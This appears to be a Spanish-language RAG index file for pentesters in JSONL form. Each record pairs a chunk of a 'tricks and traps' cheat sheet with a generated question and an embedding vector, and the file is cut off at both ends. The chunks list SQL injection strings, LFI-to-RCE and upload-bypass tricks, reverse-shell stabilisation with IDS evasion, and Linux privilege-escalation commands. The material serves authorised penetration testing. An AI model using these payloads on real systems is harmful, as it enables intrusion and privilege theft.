-0.01086, 0.04522, 0.02975, -0.09885, -0.07905, -0.05828, 0.06987, -0.02855, 0.01861, 0.04069, 0.00024, -0.00869, 0.00905, -0.01814, -0.05944, 0.08968, 0.01742, -0.01915, -0.07305, 0.06317, -0.08626, -0.01502, 0.01634, -0.08646, 0.01004, 0.06267, -0.02408, 0.06846, -0.00891, -0.01792, -0.00149, -0.03819, 0.0172, -0.02659, 0.11609, -0.02902, -0.13069, 0.08872, -0.02728, 0.03599, 0.06429, -0.10855, 0.02372, 0.00088, -0.02601, -0.04778, -0.06293, 0.01295, -0.03074, -0.05225, -0.01502, 0.00184, 0.00387, -0.06231, 0.04684, 0.04286, 0.02455, -0.03755, -0.03612, 0.06651, 0.04786, -0.03588, -0.0436, 0.03258, 0.02768, -0.06348, -0.09327, -0.02495, -0.00993, 0.01857, 0.10961, 0.03892, -0.02145, 0.04604, -0.07048, 0.09534, 0.07875, -0.02878, 0.09389, -0.03505, -0.04285, -0.06538, -0.01065, -0.08253, 0.01169, 0.06613, -0.00692, -0.02004, 0.1107, 0.05337, 0.01049, 0.03958, 0.03754, -0.01878, 0.03397, 0.06941, 0.03069, 0.03106, -0.02903, 0.01507, 0.04418, -0.02063, 0.01696, -0.02098, -0.04055, -0.06168, 0.0014, 0.11451, -0.03464, -0.07402, -0.03526, -0.05641, -0.08762, 0.01714, -0.04095, -0.07775, -0.04464, -0.00515, 0.07762, -0.05234, 0.0379, -0.03704]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas web\n\n```\n─ \"robots.txt es perezoso\" ───────────────────────────────\n Mira tambiΓ©n: sitemap.xml, .git/, .svn/, .htaccess,\n .DS_Store, backup/, old/, dev/, test/, admin/\n\n─ Source HTML / JS ───────────────────────────────────────\n Ctrl+U siempre. Comentarios con creds, paths, endpoints\n JS embebidos con APIs ocultas (LinkFinder, JSparser)\n\n─ LFI β†’ RCE ──────────────────────────────────────────────\n Si tienes LFI bΓ‘sico, prueba:\n /proc/self/environ (con User-Agent malicioso)\n /var/log/apache2/access.log (poison + curl con UA payload)\n php://filter/convert.base64-encode/resource=index.php\n data://, expect://, phar:// (PHP wrappers)\n\n─ Upload \"filtrado\" ──────────────────────────────────────\n Doble extensiΓ³n: shell.php.jpg, shell.phtml, .phar, .pht\n Magic bytes: GIF89a;\n Burp β†’ cambia Content-Type a image/jpeg\n .htaccess para reasignar handler\n\n─ SQLi sin sqlmap ────────────────────────────────────────\n Aprende manual primero. sqlmap a veces miente.\n Para login: ' OR '1'='1'-- - (con space-doble-dash-space)\n Time-based: ' AND SLEEP(5)-- -\n```\n\n---", "indexar": "quΓ© herramienta o mΓ©todo usas para detectar SQLi sin depender de herramientas automΓ‘ticas?", "v": [0.06851, 0.0215, -0.14698, -0.19207, -0.00542, -0.1405, -0.12752, -0.0858, -0.0596, 0.07103, -0.12796, -0.03137, -0.00994, -0.11479, 0.0994, 0.04415, 0.08807, -0.20509, -0.02525, -0.00102, 0.04162, -0.07847, -0.05358, -0.05905, -0.08274, 0.00197, 0.10073, -0.03014, -0.205, 0.02635, -0.01996, 0.05894, 0.05552, -0.02646, -0.11048, -0.0609, -0.08112, 0.03123, -0.02181, 0.03599, -0.01522, 0.00028, -0.12311, 0.01637, 0.09424, 0.00247, 0.00454, 0.01725, -0.03905, 0.07112, 0.01037, -0.08201, -0.15029, -0.0607, -0.04168, -0.12657, 0.16488, 0.01402, 0.06097, -0.09056, -0.09834, 0.02385, -0.03041, 0.08144, -0.0233, 0.00854, 0.07826, -0.10617, -0.02592, 0.12154, 0.01848, -0.07352, 0.01473, -0.01237, 0.03421, 0.0436, 0.10064, 0.03523, 0.1023, -0.08114, -0.07416, -0.06195, -0.04974, 0.07634, -0.02322, -0.08636, 0.10689, -0.00888, 0.03699, -0.11715, -0.05901, 0.01091, 0.01721, 0.0516, 0.05674, -0.04481, 0.06031, -0.05891, 0.00125, 0.04339, 0.13787, -0.12189, -0.02316, 0.16003, 0.03267, 0.04256, 0.01798, 0.04714, -0.06098, -0.08382, 0.07461, 0.02616, 0.01063, -0.02964, -0.0367, 0.10403, 0.06279, -0.00409, -0.11006, 0.01268, 0.00874, 0.04645, -0.05766, -0.05368, 0.0272, -0.1073, -0.02382, 0.08323, 0.01585, -0.06829, 0.00923, -0.04987, -0.06964, 0.01677, 0.01639, 0.06509, 0.03107, -0.15159, -0.06886, -0.07537, -0.02143, 0.03882, -0.03824, -0.13006, 0.08446, -0.04652, 0.00101, -0.0416, -0.04358, -0.05005, 0.02486, -0.03058, 0.03359, 0.00239, -0.01065, -0.02414, -0.01046, -0.01358, -0.08374, 0.07151, -0.01248, -0.03919, 0.03232, 0.00691, -0.00118, -0.00566, 0.05509, 0.00631, 0.04401, 0.02165, 0.05951, 0.04589, 0.07302, -0.05253, -0.02831, -0.00925, -0.02673, -0.03197, 0.00649, -0.10376, -0.0073, 0.04866, -0.05273, -0.09104, 0.0323, -0.00515, 0.0165, -0.04194, 0.04685, 0.05044, -0.00461, 0.00055, -0.01566, -0.0845, 0.03406, 0.04965, 0.01376, -0.05421, 0.05629, -0.02533, -0.0822, -0.0135, -0.00966, -0.03538, -0.00703, 0.07296, -0.0205, 0.00695, 0.01044, -0.00629, 0.05409, -0.02345, 0.02023, -0.03526, -0.00321, -0.02769, -0.08268, -0.01074, -0.02055, -0.00182, 0.03605, -0.01064, 0.07654, -0.00902, -0.06385, 0.01115, -0.01026, 0.08079, 0.06273, -0.0092, 0.01334, 0.01491, -0.01083, 0.00965, 0.01091, -0.06462, 0.04571, -0.06024, -0.04778, -0.04271, 0.0497, 0.02587, 0.01622, 0.00023, -0.05368, -0.0299, -0.02737, -0.0319, -0.01852, -0.05022, -0.01977, -0.0005, 0.03897, -0.0407, 0.00875, -0.04905]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de shell\n\n```\n─ Shell rota = tortura ────────────────────────────────────\n python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n Ctrl+Z\n stty raw -echo; fg\n export TERM=xterm\n stty rows 40 columns 120\n (rows/cols los sacas con \"stty size\" en TU kali)\n\n─ Listener equivocado ────────────────────────────────────\n nc clΓ‘sico para Linux victim\n ncat --ssl para evitar IDS\n stty raw -echo + nc para Windows ConPtyShell\n\n─ Egress filtering ───────────────────────────────────────\n El firewall del objetivo bloquea ciertos puertos\n PRUEBA: 80, 443, 8080, 53, 4444. Si nada, ICMP shell.\n```\n\n---", "indexar": "que programa sirve para forzar un shell bash si no funciona?", "v": [-0.0269, 0.00853, -0.15715, -0.08843, -0.03765, -0.19808, -0.10569, -0.11746, 0.07556, 0.00659, -0.13376, -0.06885, 0.02632, -0.08763, -0.00448, -0.01296, -0.06473, -0.08636, 0.00342, 0.06727, 0.06262, 0.06881, -0.05015, -0.13475, -0.13067, 0.12066, -0.02941, -0.01267, -0.15499, 0.03095, -0.00139, -0.18604, 0.13722, -0.10144, 0.03486, 0.08433, 0.02689, -0.05098, 0.04331, 0.1758, -0.0621, 0.08237, -0.02738, 0.08947, 0.08705, 0.00649, 0.08375, -0.07626, 0.0392, 0.0008, -0.0301, -0.06121, -0.10807, 0.10631, 0.05359, -0.06344, -0.03121, -0.16606, -0.07155, 0.00891, -0.11324, -0.06251, 0.03556, -0.02384, 0.05817, -0.02372, 0.06889, -0.10009, -0.01968, 0.05505, -0.0572, 0.06671, 0.00621, 0.04581, -0.09, 0.03109, -0.01862, -0.03152, 0.01314, 0.01363, 0.01139, -0.00013, 0.04298, 0.12907, -0.05615, -0.04005, 0.03407, -0.08351, 0.01453, 0.00831, -0.06817, 0.12146, 0.07113, 0.10868, 0.07155, -0.06072, 0.06766, -0.01251, 7e-05, 0.05364, 0.09766, -0.09059, -0.1051, 0.15422, -0.02839, 0.03821, 0.07848, 0.03103, -0.02594, 0.09784, 0.01796, -0.08254, -0.06314, -0.03983, -0.10679, 0.01488, -0.05768, -0.06206, 0.02944, -0.00429, -0.07151, 0.06878, -0.058, 0.03871, 0.02331, 0.02877, 0.03842, 0.11187, -0.03428, 0.08056, 0.04181, 0.00639, 0.0313, 0.0328, -0.03111, -0.04148, 0.02909, -0.01517, -0.06562, -0.05933, 0.05007, 0.08461, -0.05189, 0.02118, -0.00918, -0.03883, 0.05795, -0.04671, 0.04082, -0.0375, 0.07685, 0.01621, -0.00283, 0.02971, -0.09064, -0.06523, 0.06118, 0.03475, -0.05109, -0.00641, -0.01017, -0.03319, -0.03171, 0.01682, 0.01877, -0.0321, -0.02739, 0.00669, 0.09357, 0.14951, 0.02002, 0.05881, 0.08496, -0.10087, -0.00551, 0.0175, -0.03386, -0.02283, 0.06266, -0.00592, 0.00041, 0.03729, 0.07473, -0.02328, 0.0024, 0.00992, -0.00443, 0.04492, -0.04318, -0.0097, 0.0185, -0.01726, -0.02499, -0.01964, -0.01959, 0.00657, -0.02796, -0.07965, 0.05203, 0.00136, 0.00338, 0.0687, 0.01927, -0.01593, 0.01772, 0.0605, -0.04195, -0.02203, 0.06863, 0.04595, -0.02638, 0.00682, 0.00097, 0.10466, -0.02745, -0.01351, 0.02415, 0.03175, 0.07626, 0.00238, -0.06182, -0.06329, -0.0198, 0.08828, -0.00718, -0.06603, 0.01433, -0.02325, -0.00945, -0.00054, 0.00907, -0.04083, 0.02656, 0.01323, -0.05074, -0.07043, -0.0519, 0.01479, 0.01625, -0.06985, -0.07022, 0.01458, -0.01365, -0.02333, 0.01035, 0.04058, 0.00433, -0.08007, -0.00034, 0.02506, -0.05805, -0.01447, -0.03529, 0.00055, 0.04574, 0.05804]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de shell\n\n```\n─ Shell rota = tortura ────────────────────────────────────\n python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n Ctrl+Z\n stty raw -echo; fg\n export TERM=xterm\n stty rows 40 columns 120\n (rows/cols los sacas con \"stty size\" en TU kali)\n\n─ Listener equivocado ────────────────────────────────────\n nc clΓ‘sico para Linux victim\n ncat --ssl para evitar IDS\n stty raw -echo + nc para Windows ConPtyShell\n\n─ Egress filtering ───────────────────────────────────────\n El firewall del objetivo bloquea ciertos puertos\n PRUEBA: 80, 443, 8080, 53, 4444. Si nada, ICMP shell.\n```\n\n---", "indexar": "con que puedo escuchar el trΓ‘fico de red sin ser detectado?", "v": [0.05261, 0.173, -0.18445, -0.13616, 0.03954, 0.03313, -0.12879, 0.10895, 0.12085, -0.04811, -0.06494, -0.07133, -0.05362, -0.0135, 0.15567, 0.02416, -0.029, 0.07193, 0.06692, -0.12917, 0.06569, -0.07602, -0.00839, 0.01012, 0.14492, 0.03053, -0.02489, -0.02444, -0.04871, 0.01368, 0.00607, 0.02957, 0.10679, 0.0202, -0.04341, 0.0325, 0.01698, 0.08435, 0.05013, 0.00296, 0.00735, -0.01707, -0.10744, -0.04849, 0.05827, -0.04365, -0.10709, -0.07438, -0.11251, 0.02182, -0.00413, 0.00398, -0.16545, -0.11161, -0.02467, -0.06519, 0.06983, 0.00825, 0.06952, -0.09286, 0.04072, 0.04436, 0.05349, -0.01149, 0.02703, -0.03631, 0.10799, 0.12142, -0.01482, -0.01904, 0.04945, 0.02955, -0.01567, 0.12794, 0.13029, -0.01816, 0.00778, -0.01602, 0.14039, -0.00912, 0.10558, 0.06766, 0.01919, -0.01811, -0.01437, 0.00165, 0.06502, -0.05844, -0.04973, 0.02145, -0.03438, 0.06351, 0.06123, 0.01756, 0.11657, 0.05625, -0.01286, -0.089, 0.01518, 0.01045, 0.07133, 0.05076, -0.02716, -0.01497, 0.10467, 0.0868, 0.03526, -0.07437, 0.12707, 0.00047, -0.10368, -0.0286, 0.05183, -0.05987, -0.0063, -0.06246, 0.00695, 0.04918, -0.03858, 0.03524, -0.00363, -0.00515, -0.06651, -0.02986, -0.03709, -0.09349, -0.04218, 0.06752, 0.0702, 0.00223, 0.0112, 0.00398, -0.01016, -0.16182, -0.0503, 0.00213, -0.15829, -0.03255, -0.02332, 0.09309, 0.05018, 0.01304, 0.00986, -0.03382, 0.04157, 0.02363, -0.04266, -0.07925, -0.02172, -0.01578, 0.02729, -0.0264, -0.04136, -0.04835, 0.03235, 0.09343, 0.08244, -0.05555, -0.01334, -0.00351, -0.03104, 0.06419, -0.03966, 0.01269, 0.04926, 0.04132, 0.01679, 0.04033, 0.09527, -0.0286, -0.0794, -0.04271, 0.00969, -0.08261, -0.11649, -0.09629, -0.08162, -0.06184, 0.0924, -0.08583, -0.0806, -0.02712, -0.1191, -0.04308, 4e-05, -0.04465, -0.00407, -0.03951, -0.03578, -0.02612, 0.0169, -0.00453, 0.0202, 0.04644, 0.01148, -0.0129, 0.04599, 0.01604, -0.03206, -0.0213, -0.08374, -0.04511, 0.00111, -0.03497, 0.00241, -0.04992, -0.00579, 0.04269, 0.04541, 0.11769, 0.02956, -0.04759, 0.04394, -0.02948, -0.05265, -0.04445, -0.01128, -0.02615, 0.02774, 0.03999, 0.02881, 0.0504, 0.07176, 0.00327, -0.04822, 0.00083, -0.00042, 0.00938, 0.14105, 0.06848, -0.03393, 0.04261, -0.00364, 0.00219, -0.04795, -0.0059, -0.03143, 0.02663, -0.09074, -0.03908, 0.0781, 0.0293, -0.02104, -0.05681, 0.01791, -0.04242, -0.03939, 0.01614, 0.02047, -0.04672, -0.02785, 0.09382, 0.07974, -0.06742, 0.08309, -0.02785]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de shell\n\n```\n─ Shell rota = tortura ────────────────────────────────────\n python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n Ctrl+Z\n stty raw -echo; fg\n export TERM=xterm\n stty rows 40 columns 120\n (rows/cols los sacas con \"stty size\" en TU kali)\n\n─ Listener equivocado ────────────────────────────────────\n nc clΓ‘sico para Linux victim\n ncat --ssl para evitar IDS\n stty raw -echo + nc para Windows ConPtyShell\n\n─ Egress filtering ───────────────────────────────────────\n El firewall del objetivo bloquea ciertos puertos\n PRUEBA: 80, 443, 8080, 53, 4444. Si nada, ICMP shell.\n```\n\n---", "indexar": "como pruebo si el firewall del objetivo bloquea puertos comunes como 443 o 80?", "v": [0.1305, -0.15082, -0.05941, -0.15758, -0.04986, -0.05259, 0.14277, -0.11611, -0.10147, -0.1176, -0.06565, 0.08544, 0.04778, 0.00286, 0.04544, -0.09556, -0.13606, -0.06013, -0.04306, -0.10326, -0.06323, -0.06673, 0.04488, -0.0027, -0.0278, -0.01962, -0.07354, 0.06503, -0.1442, -0.10339, 0.08479, -0.06776, 0.19955, -0.02836, 0.0748, -0.08743, -0.02897, 0.08287, 0.10914, 0.09079, -0.04149, -0.05744, -0.07134, -0.07234, 0.03651, -0.07216, 0.01541, 0.00582, 0.13627, -0.06227, -0.06339, -0.02795, -0.03648, 0.09725, 0.03401, 0.05157, 0.14369, 0.06938, 0.00781, 0.01249, -0.15372, -0.03532, 0.03105, -0.08345, -0.02061, -0.11687, -0.0135, 0.02126, -0.05509, 0.0153, 0.01239, -0.03429, -0.01103, -0.03416, 0.04321, -0.03665, -0.07321, 0.01868, 0.01002, 0.0213, 0.05424, -0.00697, 0.04076, -0.11233, -0.08137, -0.06425, -0.13809, -0.10264, -0.05392, -0.09223, 0.10179, -5e-05, -0.0126, 0.00917, 0.01793, -0.0442, -0.02667, 0.19276, 0.00351, -0.06926, -0.0063, 0.03703, -0.07058, 0.09031, 0.06467, 0.00777, -0.0836, -0.08048, 0.00696, -0.01708, -0.01897, -0.01539, 0.04829, -0.08396, 0.04788, -0.05143, -0.02164, -0.05863, 0.13059, -0.06847, -0.11354, -0.0736, -0.08628, 0.00227, 0.05622, -0.0183, 0.02839, 0.05184, -0.0215, 0.00226, -0.03499, 0.04629, -0.09734, -0.02724, -0.09753, 0.04474, -0.01189, -0.08273, -0.06444, -0.02585, 0.03398, 0.04031, 0.01554, -0.00134, 0.0618, -0.01076, -0.02177, -0.02118, -0.08434, -0.02242, 0.04539, 0.03794, -0.07541, 0.02738, -0.04807, 0.02732, 0.02182, -0.04432, 0.00046, 0.07198, 0.0482, 0.00363, -0.03806, 0.01977, 0.02098, 0.01526, -0.10587, -0.00671, 0.07904, -0.02344, -0.05539, 0.05801, -0.0228, -0.14022, -0.01622, -0.02381, -0.00847, -0.03058, -0.02661, -0.04433, -0.06521, 0.00865, -0.00526, -0.04531, -0.0607, -0.05924, 0.01642, 0.00518, 0.03554, 0.08548, 0.03847, 0.00375, -0.01171, -0.0412, -0.01189, -0.01638, -0.06818, -0.01956, -0.00972, 0.00876, -0.04908, 0.00827, 0.07931, -0.08959, -0.02418, 0.03098, -0.07731, -0.0392, 0.03445, 0.08252, 0.11128, -0.08832, 0.03173, -0.03229, -0.00347, 0.0351, 0.0266, 0.04672, 0.05245, 0.04562, -0.02355, 0.08391, -0.05771, 0.07065, -0.01894, -0.04374, -0.03137, 0.04035, 0.06356, -0.01133, -0.00734, -0.01022, -0.04168, 0.04209, 0.05838, 0.04984, -0.03003, 0.03404, 0.02817, -0.03765, 0.01727, -0.04303, 0.01675, -0.02119, 0.05376, -0.05139, -0.04422, 0.05342, -0.01302, -0.03157, -0.00066, 0.03506, 0.019, 0.01042, 0.01148, -0.02402]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Privesc Linux β€” los 10 olvidados\n\n```\n1. SUID exΓ³ticos β†’ find / -perm -4000 2>/dev/null\n (y luego GTFOBins cada uno)\n2. sudo -l β†’ SIEMPRE primero, sin password\n3. Capabilities β†’ getcap -r / 2>/dev/null\n (cap_setuid en python/perl = root)\n4. Cron escribibles β†’ cat /etc/crontab, /var/spool/cron\n Scripts que tΓΊ puedes editar\n5. Wildcard injectionβ†’ \"tar czf /backup/* \" con file --checkpoint\n6. PATH abuse β†’ si un script SUID llama \"ps\" sin ruta\n absoluta, creas ./ps malicioso\n7. NFS no_root_squashβ†’ showmount -e ; montas y subes SUID\n8. Docker group β†’ si estΓ‘s en grupo \"docker\", eres root:\n docker run -v /:/mnt -it alpine chroot /mnt\n9. Kernel exploits β†’ ΓΊltimo recurso. DirtyCow, DirtyPipe\n (uname -a; searchsploit kernel x.x)\n10. Caps de archivo β†’ /var/backups, /etc/passwd escribible,\n /etc/shadow legible\n```\n\n---", "indexar": "que herramienta sirve para encontrar archivos con permisos especiales como SUID en Linux?", "v": [-0.01721, -0.02223, -0.1652, -0.20537, -0.01575, -0.24397, -0.21632, -0.04425, -0.04932, -0.0172, 0.01869, -0.07482, 0.11143, -0.14823, 0.05593, -0.06562, 0.02192, -0.17013, -0.00948, -0.0168, 0.01629, 0.14938, -0.14311, -0.0103, -0.017, -0.0254, 0.14439, -0.03484, -0.12249, 0.0238, -0.09709, 0.08213, 0.04257, 0.01228, -0.12261, 0.01004, 0.05086, 0.13124, -0.0659, 0.07046, 0.07383, 0.06457, -0.05672, 0.07443, -0.078, -0.16358, -0.01942, 0.05009, 0.03479, -0.00699, 0.013, -0.10018, -0.11916, -0.03819, 0.05154, -0.05713, 0.12261, -0.15505, -0.0163, 0.03284, -0.21608, 0.00031, -0.00402, -0.03039, 0.03422, 0.03726, 0.00521, -0.00654, -0.07659, 0.03971, -0.0419, 0.08231, 0.03573, -0.00372, -0.00787, 0.00885, -0.08149, 0.06215, 0.01811, -0.03351, 0.13633, 0.01871, -0.04043, -0.00493, -0.07022, -0.15263, 0.02303, 0.02954, -0.01464, 0.02898, 0.04657, 0.07682, 0.02655, 0.02885, 0.10554, -0.01569, 0.09123, 0.02901, -0.03155, -0.06532, 0.03226, 0.00547, -0.0431, 0.10578, -0.03111, 0.04167, 0.01464, 0.0001, -0.04587, -0.0118, 0.08033, -0.00259, 0.08764, 0.07713, -0.06066, 0.05425, -0.03725, -0.07267, -0.01739, -0.05918, 0.02334, 0.04276, -0.01677, 0.00247, -0.02337, -0.01285, -0.07192, 0.15858, -0.06485, -0.07374, 0.05024, -0.0559, -0.00476, 0.0945, -0.07214, 0.04083, 0.05338, -0.08772, -0.08372, -0.00595, 0.05766, -0.00306, 0.03587, -0.00384, 0.10284, 0.03513, 0.02881, -0.02006, -0.01789, -0.14838, -0.00021, -0.04449, 0.02489, -0.01631, -0.08604, 0.03145, -0.05718, -0.04685, -0.10174, 0.01772, -0.01345, -0.02499, -0.03727, 0.03865, -0.02236, -0.01771, -0.01327, 0.07059, 0.01496, 0.02788, 0.02931, 0.00661, 0.03702, -0.08136, 0.02035, -0.05689, 0.02563, -0.05911, 0.01379, -0.0579, -0.01727, -0.03733, -0.01861, -0.01618, 0.05449, -0.02337, 0.00345, -0.01203, 0.00559, 0.04933, -0.00135, 0.05958, 0.01829, -0.05309, -0.05982, 0.05632, -0.02064, -0.02013, -0.01956, -0.02171, -0.03679, 0.01646, -0.04607, -0.018, 0.02276, -0.00663, -0.03907, 0.00234, -0.00066, -0.03489, -0.03037, 0.00465, 0.04861, -0.01861, 0.01348, -0.00447, 0.01011, 0.04018, 0.00996, -0.01916, 0.03783, -0.00559, 0.05964, 0.01372, 0.0007, -0.03359, 0.02069, -0.0296, 0.00491, 0.00969, 0.04018, 0.00255, 0.00585, 0.01208, -0.00788, -0.0372, 0.01317, 0.0183, -0.02132, -0.0059, -0.03213, 0.03432, 0.0438, -0.04764, -0.05076, -0.0464, 0.00741, -0.03289, -0.01619, -0.04256, -0.00013, 0.03931, 0.02589, 0.01018, 0.00771, 0.00659]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Privesc Linux β€” los 10 olvidados\n\n```\n1. SUID exΓ³ticos β†’ find / -perm -4000 2>/dev/null\n (y luego GTFOBins cada uno)\n2. sudo -l β†’ SIEMPRE primero, sin password\n3. Capabilities β†’ getcap -r / 2>/dev/null\n (cap_setuid en python/perl = root)\n4. Cron escribibles β†’ cat /etc/crontab, /var/spool/cron\n Scripts que tΓΊ puedes editar\n5. Wildcard injectionβ†’ \"tar czf /backup/* \" con file --checkpoint\n6. PATH abuse β†’ si un script SUID llama \"ps\" sin ruta\n absoluta, creas ./ps malicioso\n7. NFS no_root_squashβ†’ showmount -e ; montas y subes SUID\n8. Docker group β†’ si estΓ‘s en grupo \"docker\", eres root:\n docker run -v /:/mnt -it alpine chroot /mnt\n9. Kernel exploits β†’ ΓΊltimo recurso. DirtyCow, DirtyPipe\n (uname -a; searchsploit kernel x.x)\n10. Caps de archivo β†’ /var/backups, /etc/passwd escribible,\n /etc/shadow legible\n```\n\n---", "indexar": "con que puedo verificar si un usuario tiene privilegios de root a travΓ©s de la lista sudo sin contraseΓ±a?", "v": [0.07463, 0.06753, -0.24976, -0.12596, 0.05708, -0.07389, 0.00764, -0.14863, -0.03729, -0.08226, -0.01889, -0.04679, 0.03194, -0.0983, -0.01265, -0.05207, 0.0011, 0.00209, 0.01535, 0.05755, 0.08341, -0.10493, 0.00818, -0.02213, -0.0177, 0.04589, 0.1185, 0.00222, -0.01839, -0.02059, 0.05361, -0.02024, 0.03085, -0.01364, -0.04603, 0.07739, 0.04539, 0.12822, 0.04916, 0.14908, 0.05503, 0.10114, -0.10859, 0.14539, -0.07727, -0.01531, -0.05322, 0.00138, 0.05985, -0.04303, 0.00801, -0.12694, -0.12895, -0.07703, -0.00571, -0.06312, 0.10432, -0.06569, 0.04271, -0.0002, -0.14558, -0.02588, 0.08643, 0.10478, -0.09167, -0.04368, 0.04269, -0.01618, -0.073, 0.06028, -0.01879, 0.03273, -0.09614, -0.01158, 0.02298, -0.01193, 0.01612, -0.00825, 0.06618, 0.02678, 0.01874, -0.01689, -0.01154, -0.02949, -0.1822, -0.06725, -0.02281, -0.03642, 0.01452, -0.1009, 0.06574, 0.05733, -0.008, 0.01199, 0.07247, -0.01811, 0.01565, 0.06291, -0.05292, -0.01776, 0.10153, 0.05169, -0.02245, 0.20087, 0.07588, -0.02868, 0.02512, -0.05954, -0.01836, -0.09968, -0.0056, 0.00226, -0.09011, -0.07177, -0.019, 0.0244, -0.11359, -0.11826, -0.00059, -0.06129, -0.08473, -0.08658, -0.0222, -0.05264, 0.05789, -0.01054, -0.03476, 0.13793, -0.00391, -0.00183, -0.0108, -0.01388, -0.01587, -0.00496, -0.06606, 0.03964, -0.08346, -0.08845, -0.05759, -0.02539, 0.01564, 0.00427, 0.01823, -0.05711, 0.12033, 0.0199, -0.04278, -0.05646, -0.17159, -0.02283, -0.06991, -0.04775, -0.006, 0.08184, -0.05395, 0.04174, -0.00938, -0.05487, 0.08815, 0.07513, 0.00837, -0.08341, -0.08481, 0.03052, -0.05311, -0.0274, -0.00734, -0.01989, 0.06484, -0.00743, -0.05417, 0.09087, -0.03571, -0.04996, -0.0354, -0.05195, 0.0417, -0.06079, 0.03417, -0.00714, -0.04641, 0.01819, 0.01144, -0.03707, -0.05848, -0.07988, 0.01821, -0.01454, 0.0426, 0.00364, 0.05727, 0.07118, 0.0249, 0.0784, 0.04507, -0.01243, -0.03439, 0.00449, -0.01879, -0.07219, -0.04437, 0.03454, -0.03341, -0.05402, 0.05083, -0.02225, -0.03716, -0.03841, -0.02528, 0.03006, 0.04301, -0.00813, 0.08615, -0.02896, -0.05073, -0.0573, 0.01577, -8e-05, -0.03474, -0.02784, 0.03354, 0.07463, 0.08238, 0.02963, 0.01145, -0.01508, 0.00416, 0.00082, 0.0462, 0.05273, -0.02763, 0.04958, -0.01287, -0.06276, 0.10468, -0.00698, -6e-05, -0.03192, -0.02613, -0.03093, -0.00256, 0.08357, -0.01081, -0.10834, -0.02839, 0.00023, -0.1215, 0.00404, 0.00889, -0.07045, 0.0093, 0.02858, 0.07011, -0.06264, 0.03759, -0.03585]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Privesc Linux β€” los 10 olvidados\n\n```\n1. SUID exΓ³ticos β†’ find / -perm -4000 2>/dev/null\n (y luego GTFOBins cada uno)\n2. sudo -l β†’ SIEMPRE primero, sin password\n3. Capabilities β†’ getcap -r / 2>/dev/null\n (cap_setuid en python/perl = root)\n4. Cron escribibles β†’ cat /etc/crontab, /var/spool/cron\n Scripts que tΓΊ puedes editar\n5. Wildcard injectionβ†’ \"tar czf /backup/* \" con file --checkpoint\n6. PATH abuse β†’ si un script SUID llama \"ps\" sin ruta\n absoluta, creas ./ps malicioso\n7. NFS no_root_squashβ†’ showmount -e ; montas y subes SUID\n8. Docker group β†’ si estΓ‘s en grupo \"docker\", eres root:\n docker run -v /:/mnt -it alpine chroot /mnt\n9. Kernel exploits β†’ ΓΊltimo recurso. DirtyCow, DirtyPipe\n (uname -a; searchsploit kernel x.x)\n10. Caps de archivo β†’ /var/backups, /etc/passwd escribible,\n /etc/shadow legible\n```\n\n---", "indexar": "como montar una carpeta compartida NFS y subirla ejecutable para que se ejecute con permisos de administrador?", "v": [0.1727, 0.03757, -0.20278, -0.1187, 0.01121, -0.06405, 0.05208, -0.01158, -0.14523, -0.1053, -0.12413, 0.00486, 0.02642, -0.03272, 0.0274, -0.02404, 0.06043, -0.02648, -0.00921, 0.0035, 0.04887, 0.00752, 0.1187, -0.01162, -0.06642, 0.07403, 0.08261, 0.03742, -0.11365, -0.10743, 0.07421, 0.13221, 0.05155, -0.04743, 0.149, -0.00163, -0.05392, -0.09513, -0.08439, -0.05481, 0.03872, 0.16393, -0.19654, 0.00707, -0.04579, -0.0087, -0.03601, -0.08755, 0.0486, -0.01607, 0.04834, -0.02824, -0.10827, -0.10594, -0.02292, -0.03471, 0.14269, -0.14242, 0.02342, 0.06207, -0.02733, -0.05452, 0.01549, 0.03562, -0.01983, -0.01651, 0.06515, -0.01845, -0.03361, 0.07014, -0.08354, 0.08167, 0.00979, 0.04023, 0.02772, 0.01615, -0.09742, -0.03073, -0.01651, 0.06222, 0.05353, -0.08031, -0.14305, 0.01353, -0.05864, -0.11766, -0.09893, -0.14905, 0.00462, 0.05325, 0.07727, -0.05485, -0.00609, -0.01282, 0.0818, -0.08314, 0.08031, 0.04059, -0.00043, 0.00945, 0.0616, 0.00566, -0.02813, 0.17491, -0.02945, 0.10612, 0.00788, -0.02467, 0.02662, -0.02393, 0.10854, 0.03328, -0.06254, 0.01255, -0.06571, -0.10223, -0.08562, -0.06147, -0.05473, 0.00475, -0.04428, -0.02122, 0.04508, 0.09003, 0.05556, -0.05821, 0.02564, 0.11399, -0.04243, 0.02671, -0.08813, -0.01252, 0.03269, -0.02978, -0.07452, 0.06237, -0.06636, -0.01726, -0.03062, -0.10953, 0.0666, 0.04251, 0.04026, -0.01823, 0.05705, 0.06948, -0.02629, -0.07518, -0.01107, 0.0072, 0.11473, 0.03666, -0.02427, 0.04292, -0.03311, -0.02364, 0.05766, -0.03039, -0.0461, 0.10049, 0.00483, -0.00926, -0.01544, 0.0677, 0.02053, 0.01914, -0.05214, -0.02183, 0.03633, 0.03567, -0.0724, 0.05354, -0.0314, -0.01826, 0.07394, -0.04707, -0.03724, -0.0951, 0.04293, 0.0423, -0.02438, -0.02097, -0.00194, 0.06124, -0.08127, -0.04736, 0.02066, -0.00028, -0.05067, 0.07965, 0.0479, 0.05323, -0.02098, 